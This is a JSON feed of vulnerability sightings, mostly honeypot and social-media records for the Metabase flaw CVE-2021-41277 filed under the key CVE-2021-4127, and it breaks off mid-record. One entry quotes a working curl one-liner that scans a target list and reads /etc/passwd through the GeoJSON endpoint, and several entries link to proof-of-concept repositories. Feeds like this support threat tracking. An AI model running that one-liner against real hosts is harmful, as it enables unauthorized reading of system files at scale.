{"vulnerability": "CVE-2021-4127", "sightings": [{"uuid": "f48cdd6d-9957-43a3-baa3-e00d2e085460", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2659502", "content": "", "creation_timestamp": "2024-11-12T19:24:15.536378Z"}, {"uuid": "648460d0-e21c-49b3-a13c-1ff9686919c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://infosec.exchange/users/screaminggoat/statuses/113471442114730989", "content": "", "creation_timestamp": "2024-11-12T18:40:00.715502Z"}, {"uuid": "113e484e-5113-420a-8da1-2fa890f1bc69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2024-11-12T21:10:02.000000Z"}, {"uuid": "ed8f4d4d-613e-4616-a8f0-5721b503337d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-30)", "content": "", "creation_timestamp": "2025-01-30T00:00:00.000000Z"}, {"uuid": "27055d37-8726-4dab-a509-13d8a50eb38e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-27)", "content": "", "creation_timestamp": "2025-01-27T00:00:00.000000Z"}, {"uuid": "5acf8f3b-eefc-4838-a27c-db226e6789fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-31)", "content": "", "creation_timestamp": "2025-01-31T00:00:00.000000Z"}, {"uuid": "bdb7eb78-3a4f-4291-a7bc-da19fd87b2a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-29)", "content": "", "creation_timestamp": "2025-01-29T00:00:00.000000Z"}, {"uuid": "f5c8b394-e7b7-42d2-9cd1-ca5fb7db1704", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-29)", "content": "", "creation_timestamp": "2025-01-29T00:00:00.000000Z"}, {"uuid": "c29af405-16c7-4a3f-beb2-9b63fa2e9f91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-01)", "content": "", "creation_timestamp": "2025-02-01T00:00:00.000000Z"}, {"uuid": "af96c2ca-99b6-4270-8376-4ad9b522684f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-26)", "content": "", "creation_timestamp": "2025-01-26T00:00:00.000000Z"}, {"uuid": "c26b5eac-3983-4509-8491-1d72cceb94d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-01-28)", "content": "", "creation_timestamp": "2025-01-28T00:00:00.000000Z"}, {"uuid": "9c795976-8fbf-41bb-98c3-a2cfbaad632b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-01)", "content": "", "creation_timestamp": "2025-02-01T00:00:00.000000Z"}, {"uuid": "7685a89f-a732-4624-9ce3-1b3c141a7785", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-01-28)", "content": "", "creation_timestamp": "2025-01-28T00:00:00.000000Z"}, {"uuid": "9f3edd21-b560-48cb-b534-54e014b09fb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-15)", "content": "", "creation_timestamp": "2025-03-15T00:00:00.000000Z"}, {"uuid": "542427aa-5329-412c-811c-aa17a0606fec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-09)", "content": "", "creation_timestamp": "2025-02-09T00:00:00.000000Z"}, {"uuid": "f22aecdd-9d3f-40f9-86fe-ed214b453f2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-05)", "content": "", "creation_timestamp": "2025-03-05T00:00:00.000000Z"}, {"uuid": "dabcc3bc-30ae-4933-a44a-aca492d9dea1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-02-15)", "content": "", "creation_timestamp": "2025-02-15T00:00:00.000000Z"}, {"uuid": "e67a73b2-7339-447a-a8e8-9071948b23a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-09)", "content": "", "creation_timestamp": "2025-03-09T00:00:00.000000Z"}, {"uuid": "32e0a312-9a4f-4a18-bc78-5fc02e9e52b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-03-09)", "content": "", "creation_timestamp": "2025-03-09T00:00:00.000000Z"}, {"uuid": "50a0c7df-7bc1-4907-a6dc-5ce7a4c2f272", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-02-15)", "content": "", "creation_timestamp": "2025-02-15T00:00:00.000000Z"}, {"uuid": "41f59f5e-edb0-4635-8af6-c4293d46690b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-03-15)", "content": "", "creation_timestamp": "2025-03-15T00:00:00.000000Z"}, {"uuid": "87e3ac30-b4cf-4334-a38f-63219838d927", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:11:01.000000Z"}, {"uuid": "483b560b-f161-4cbf-ac31-6408d530f876", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-17)", "content": "", "creation_timestamp": "2025-06-17T00:00:00.000000Z"}, {"uuid": "3bc71f1d-3d0b-4174-a0f4-f79ee2ec6edb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-04-12)", "content": "", "creation_timestamp": "2025-04-12T00:00:00.000000Z"}, {"uuid": "c79e9ee1-45ff-433a-9f46-3bacc0b56e91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-01)", "content": "", "creation_timestamp": "2025-07-01T00:00:00.000000Z"}, {"uuid": "898fefb4-432c-42c7-ad6f-914f00317ef4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-20)", "content": "", "creation_timestamp": "2025-04-20T00:00:00.000000Z"}, {"uuid": "88c8c42f-5203-4025-a22f-729fd12fa68a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-04-24)", "content": "", "creation_timestamp": "2025-04-24T00:00:00.000000Z"}, {"uuid": "18272979-ca47-495c-aaeb-e3d94270c7be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-02)", "content": "", "creation_timestamp": "2025-06-02T00:00:00.000000Z"}, {"uuid": "472e8049-8e48-41ac-b1c7-4839e47d4a47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lordwbykcs25", "content": "", "creation_timestamp": "2025-05-09T21:15:54.053232Z"}, {"uuid": "89d4376a-2bfd-423b-b2e6-8821f5a07074", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lordwdagok25", "content": "", "creation_timestamp": "2025-05-09T21:15:54.699739Z"}, {"uuid": "56f65479-6936-4d02-846b-68597fde863f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-06-18)", "content": "", "creation_timestamp": "2025-06-18T00:00:00.000000Z"}, {"uuid": "83708d17-1081-4ef2-a48a-29a8ba474f43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-25)", "content": "", "creation_timestamp": "2025-07-25T00:00:00.000000Z"}, {"uuid": "7394f466-4000-4860-b954-0335fece64c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-07-20)", "content": "", "creation_timestamp": "2025-07-20T00:00:00.000000Z"}, {"uuid": "b146a48f-09e4-46e0-9ae8-b50dd5eafcb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-01)", "content": "", "creation_timestamp": "2026-01-01T00:00:00.000000Z"}, {"uuid": "4f1a1e95-4955-4d6e-bfdf-2c6f8c31a5f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41278", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lyo5wachhi2g", "content": "", "creation_timestamp": "2025-09-12T21:02:25.170006Z"}, {"uuid": "b2dfab2d-6fe6-4d59-b1bf-226687df846d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-06)", "content": "", "creation_timestamp": "2026-01-06T00:00:00.000000Z"}, {"uuid": "a6f5743f-bb5e-4b5d-91a8-440f6824f008", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-27)", "content": "", "creation_timestamp": "2026-03-27T00:00:00.000000Z"}, {"uuid": "39742f19-2af3-4369-8e14-57dd7bf3051c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-22)", "content": "", "creation_timestamp": "2026-03-22T00:00:00.000000Z"}, {"uuid": "cdf4cee6-3932-470e-b73e-087843354304", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-11)", "content": "", "creation_timestamp": "2026-01-11T00:00:00.000000Z"}, {"uuid": "ce76bae9-c044-4ef8-a43f-0574c6f1254d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-01-12)", "content": "", "creation_timestamp": "2026-01-12T00:00:00.000000Z"}, {"uuid": "7c266bcb-366c-46c1-9f7b-3a3c24a2f954", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-26)", "content": "", "creation_timestamp": "2026-03-26T00:00:00.000000Z"}, {"uuid": "1c8cb074-27c5-4c68-96a8-78bac98f6fd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-22)", "content": "", "creation_timestamp": "2026-03-22T00:00:00.000000Z"}, {"uuid": "35b9ed79-a537-48a7-b06b-43a045d6469a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-20)", "content": "", "creation_timestamp": "2026-03-20T00:00:00.000000Z"}, {"uuid": "f1b15841-bf25-4bf2-8c6c-114470dc28ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-03-21)", "content": "", "creation_timestamp": "2026-03-21T00:00:00.000000Z"}, {"uuid": "0c1211ed-f0bf-4e43-b034-bc487fe823ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/318678a8-3f9f-4940-843d-ef7f2ce5abc2", "content": "", "creation_timestamp": "2026-02-02T12:26:22.530201Z"}, {"uuid": "ff0f2e8f-2a52-4b16-97a7-31292d68006e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-02)", "content": "", "creation_timestamp": "2026-04-02T00:00:00.000000Z"}, {"uuid": "607c42e8-0d06-431a-b7f6-40548889e563", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-03)", "content": "", "creation_timestamp": "2026-04-03T00:00:00.000000Z"}, {"uuid": "36f66f5c-ff4b-4323-9a5c-2464eabf27e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://t.me/cKure/8206", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Zero-Day | CVE-2021-41277\n\ncat targets.txt | while read host do;do curl --silent --insecure --path-as-is \"$host/api/geojson?url=file:///etc/passwd\" | grep -qs \"root:x\" && echo \"$host \\033[0;31m Vulnerable\";done\n\nhttps://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr", "creation_timestamp": "2021-11-24T19:33:37.000000Z"}, {"uuid": "0a16a1d9-7a08-4423-b657-90e60e94ebbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-10)", "content": "", "creation_timestamp": "2026-04-10T00:00:00.000000Z"}, {"uuid": "fec8d615-02ec-4f54-9d9f-bcda3f36508b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-10)", "content": "", "creation_timestamp": "2026-04-10T00:00:00.000000Z"}, {"uuid": "033e09eb-ed5f-43b3-a054-cb9e563e959e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1296", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41277 can be extended to an SSRF \nURL\uff1ahttps://github.com/sasukeourad/CVE-2021-41277_SSRF", "creation_timestamp": "2022-01-10T01:54:46.000000Z"}, {"uuid": "49bb9f28-fb82-4f4e-94a0-5471adcd7c9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-11)", "content": "", "creation_timestamp": "2026-04-11T00:00:00.000000Z"}, {"uuid": "20ba10c4-afb3-4b14-a8ec-08889157d4ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-11)", "content": "", "creation_timestamp": "2026-04-11T00:00:00.000000Z"}, {"uuid": "960e34d3-10a9-4c5a-9744-413295875e36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-12)", "content": "", "creation_timestamp": "2026-04-12T00:00:00.000000Z"}, {"uuid": "2d79375b-85ff-480d-9d5c-3af474f255f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1364", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aIt is a nmap script for metabase vulnerability (CVE-2021-41277)\nURL\uff1ahttps://github.com/frknktlca/Metabase_Nmap_Script", "creation_timestamp": "2022-01-19T17:45:18.000000Z"}, {"uuid": "4a736028-3a94-43b4-841c-776bdc6e4fb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-16)", "content": "", "creation_timestamp": "2026-04-16T00:00:00.000000Z"}, {"uuid": "f970a88b-6ab6-4800-9e2a-822ac02df4db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/metabase_cve_2021_41277", "content": "", "creation_timestamp": "2021-12-01T07:22:50.000000Z"}, {"uuid": "9380e19c-f5d0-4cd1-a611-28c90e7389b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-24)", "content": "", "creation_timestamp": "2026-04-24T00:00:00.000000Z"}, {"uuid": "1eb2528e-4892-4153-9763-94d503105677", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-20)", "content": "", "creation_timestamp": "2026-04-20T00:00:00.000000Z"}, {"uuid": "dd7bc66b-aa06-48c0-881f-561857df4b18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/883", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPoC for CVE-2021-41277\nURL\uff1ahttps://github.com/tahtaciburak/CVE-2021-41277", "creation_timestamp": "2021-11-25T21:13:59.000000Z"}, {"uuid": "601f367d-8b62-4758-95f7-f9053ebbeafb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "Telegram/5u7FwDgfpeKuzG8ivHxniYFe1bK287W_1ULABUcApgjoyw", "content": "", "creation_timestamp": "2021-11-25T23:07:49.000000Z"}, {"uuid": "4cffa76b-02c3-4a23-a726-1c91427ec3dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "seen", "source": "https://t.me/arpsyndicate/1564", "content": "#ExploitObserverAlert\n\nCVE-2021-41277\n\nDESCRIPTION: Exploit Observer has 50 entries related to CVE-2021-41277. Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you\u2019re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.\n\nFIRST-EPSS: 0.067680000\nNVD-IS: 3.6\nNVD-ES: 3.9", "creation_timestamp": "2023-12-08T13:01:21.000000Z"}, {"uuid": "c82171de-abb4-4a29-8e38-4997a00c2f0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "https://t.me/hacker_trick/612", "content": "CVE-2021-41277 can be extended to an SSRF\nhttps://github.com/sasukeourad/CVE-2021-41277_SSRF\n\nSonicWall SMA-100 Unauth RCE \nExploit CVE-2021-20038\nhttps://github.com/jbaines-r7/badblood", "creation_timestamp": "2022-01-11T18:24:46.000000Z"}, {"uuid": "c68fdcae-5b4d-4c8c-b344-0c0455b06e30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41277", "type": "published-proof-of-concept", "source": "Telegram/5gxatJpYVM_NPaPWX745N9ibdK_MxDhjygYPpnblnfkz7g", "content": "", "creation_timestamp": "2021-11-23T22:40:00.000000Z"}, {"uuid": "c67a059f-3601-4572-8210-cec2453b8db8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4127", "type": "seen", "source": "https://t.me/cibsecurity/55151", "content": "\u203c CVE-2021-4127 \u203c\n\nAn out of date graphics library (Angle) likely contained vulnerabilities that could potentially be exploited. This vulnerability affects Thunderbird < 78.9 and Firefox ESR < 78.9.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-12-22T22:23:46.000000Z"}, {"uuid": "5307e376-8c15-407c-a762-9db6c6bd6f2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41270", "type": "seen", "source": "https://t.me/cibsecurity/32975", "content": "\u203c CVE-2021-41270 \u203c\n\nSymfony/Serializer handles serializing and deserializing data structures for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Symfony versions 4.1.0 before 4.4.35 and versions 5.0.0 before 5.3.12 are vulnerable to CSV injection, also known as formula injection. In Symfony 4.1, maintainers added the opt-in `csv_escape_formulas` option in the `CsvEncoder`, to prefix all cells starting with `=`, `+`, `-` or `@` with a tab `\\t`. Since then, OWASP added 2 chars in that list: Tab (0x09) and Carriage return (0x0D). This makes the previous prefix char (Tab `\\t`) part of the vulnerable characters, and OWASP suggests using the single quote `'` for prefixing the value. Starting with versions 4.4.34 and 5.3.12, Symfony now follows the OWASP recommendations and uses the single quote `'` to prefix formulas and add the prefix to cells starting by `\\t`, `\\r` as well as `=`, `+`, `-` and `@`.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-11-24T22:27:41.000000Z"}, {"uuid": "902a8773-da02-41b1-986a-009b58fee6fb", "vulnerability_lookup_origin": 